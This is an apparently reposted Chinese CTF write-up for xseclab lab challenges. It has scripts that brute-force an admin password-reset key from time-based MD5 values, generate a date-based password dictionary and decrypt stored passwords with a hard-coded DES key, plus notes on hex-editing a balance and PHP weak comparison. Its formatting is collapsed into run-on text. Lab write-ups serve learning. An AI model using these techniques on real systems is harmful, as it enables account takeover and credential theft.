本文共 2408 字,大约阅读时间需要 8 分钟。
import requestsimport hashlibimport timese = requests.session()headers = { 'Cookie': 'PHPSESSID=aa06ee795e15f980a7d40a8c7331376a'}while 1: sukey = hashlib.new('md5', str(time.time())).hexdigest() url = f'http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey={sukey}&username=admin' r = se.get(url, headers=headers) time.sleep(0.5) if r.content: print(r.content) break else: print(f'Cracking: {sukey}') with open('pass.txt', 'a') as dic: for year in range(1980, 2015): for mon in range(1, 13): for day in range(1, 32): print('%d%02d%02d' % (year, mon, day)) dic.write('%d%02d%02d\n' % (year, mon, day)) 万恶的 Cisco 在线破解就可以了
-http://www.ifm.net.nz/cookbooks/passwordcracker.html万恶的加密
Google 找到如下脚本,跑一下就行了。from Crypto.Cipher import DESdef decode_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!') def ascii_to_binary(s): assert len(s) == 24 out = [0] * 18 i = 0 j = 0 for i in range(0, len(s), 4): y = decode_char(s[i]) y = (y << 6) & 0xffffff k = decode_char(s[i+1]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i+2]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i+3]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff out[j+2] = chr(y & 0xff) out[j+1] = chr((y >> 8) & 0xff) out[j+0] = chr((y >> 16) & 0xff) j += 3 return ''.join(out)def decrypt_password(p): r = ascii_to_binary(p) r = r[:16] d = DES.new(b'\x01\x02\x03\x04\x05\x06\x07\x08', DES.MODE_ECB) r = d.decrypt(r) return r.rstrip(b'\x00')if __name__ == '__main__': miwen = "aK9Q4I)J'#[Q=^Q`MAF4<1!!\"" print(u'明文' + decrypt_password(miwen)) 说明余额
看到余额为 100 块,转为16进制是 64,数据里并没有这样的地方,仔细观察,分别转换几处不一样的数据,发现2710 转换为十进制是10000,原来是考虑了两位小数。。。那么把两处2710改为4e20 再试试。异常数据
写个脚本慢慢跑 base64吧。md5真的能碰撞嘛?
源码有 txt,打开注意到==,是 php 的弱类型漏洞,百度构造 payload 即可。小明爱上了一个搞硬件的小姑凉
需要去官网下载软件才能直接得到 flag。有签名限制的读取任意文件
不会,划水飘过。转载地址:http://xoegz.baihongyu.com/